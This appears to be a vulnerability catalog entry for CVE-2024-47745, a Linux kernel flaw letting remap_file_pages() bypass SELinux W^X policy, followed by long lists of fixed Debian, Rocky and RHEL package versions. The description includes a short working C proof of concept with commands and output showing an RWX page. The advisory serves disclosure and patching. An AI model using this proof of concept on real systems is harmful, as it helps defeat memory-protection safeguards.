CVE & CISA-KEV Catalog

CVE-2024-47745

HIGH
7.8
CVSS v3
NVD

Description

In the Linux kernel, the following vulnerability has been resolved: mm: call the security_mmap_file() LSM hook in remap_file_pages() The remap_file_pages syscall handler calls do_mmap() directly, which doesn't contain the LSM security check. And if the process has called personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for RW pages, this will actually result in remapping the pages to RWX, bypassing a W^X policy enforced by SELinux. So we should check prot by security_mmap_file LSM hook in the remap_file_pages syscall handler before do_mmap() is called. Otherwise, it potentially permits an attacker to bypass a W^X policy enforced by SELinux. The bypass is similar to CVE-2016-10044, which bypass the same thing via AIO and can be found in [1]. The PoC: $ cat > test.c int main(void) { size_t pagesz = sysconf(_SC_PAGE_SIZE); int mfd = syscall(SYS_memfd_create, "test", 0); const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE, MAP_SHARED, mfd, 0); unsigned int old = syscall(SYS_personality, 0xffffffff); syscall(SYS_personality, READ_IMPLIES_EXEC | old); syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0); syscall(SYS_personality, old); // show the RWX page exists even if W^X policy is enforced int fd = open("/proc/self/maps", O_RDONLY); unsigned char buf2[1024]; while (1) { int ret = read(fd, buf2, 1024); if (ret <= 0) break; write(1, buf2, ret); } close(fd); } $ gcc test.c -o test $ ./test | grep rwx 7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted) [PM: subject line tweaks]

How to fix

Remediation Available
linuxDebian
Fixed in:6.1.123-1CVE-2024-47745
Fixed in:6.11.2-1CVE-2024-47745
Fixed in:6.11.2-1CVE-2024-47745
bpftoolRocky
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
bpftoolRed Hat / RHEL
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
bpftool-debuginfoRed Hat / RHEL
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
bpftool-debuginfoRocky
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.3.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:7.0.0-284.117.1.el9_2RHSA-2025:7683
kernelRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernelRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64kRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64kRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-coreRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-coreRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-debugRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-debugRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-debug-coreRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-debug-coreRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-debug-debuginfoRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-debug-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-debug-develRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-debug-develRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-debug-devel-matchedRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-debug-devel-matchedRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-debug-modulesRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-debug-modulesRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-debug-modules-coreRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-debug-modules-coreRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-debug-modules-extraRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-debug-modules-extraRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-debuginfoRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-develRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-develRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-devel-matchedRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-devel-matchedRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-modulesRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-modulesRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-modules-coreRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-64k-modules-coreRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-64k-modules-extraRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-64k-modules-extraRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-abi-stablelistsRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-abi-stablelistsRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-coreRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-coreRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-debugRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debugRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-debug-coreRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-debug-coreRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-debug-debuginfoRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-debug-debuginfoRocky
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debug-develRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debug-develRed Hat / RHEL
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-debug-devel-matchedRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debug-devel-matchedRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-debug-modulesRocky
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
kernel-debug-modulesRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debug-modules-coreRed Hat / RHEL
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debug-modules-coreRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
kernel-debug-modules-extraRocky
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
kernel-debug-modules-extraRed Hat / RHEL
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-284.117.1.el9_2RHSA-2025:7683
Fixed in:0:5.14.0-570.12.1.el9_6RHSA-2025:6966
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
Fixed in:0:5.14.0-427.67.1.el9_4RHSA-2025:4509
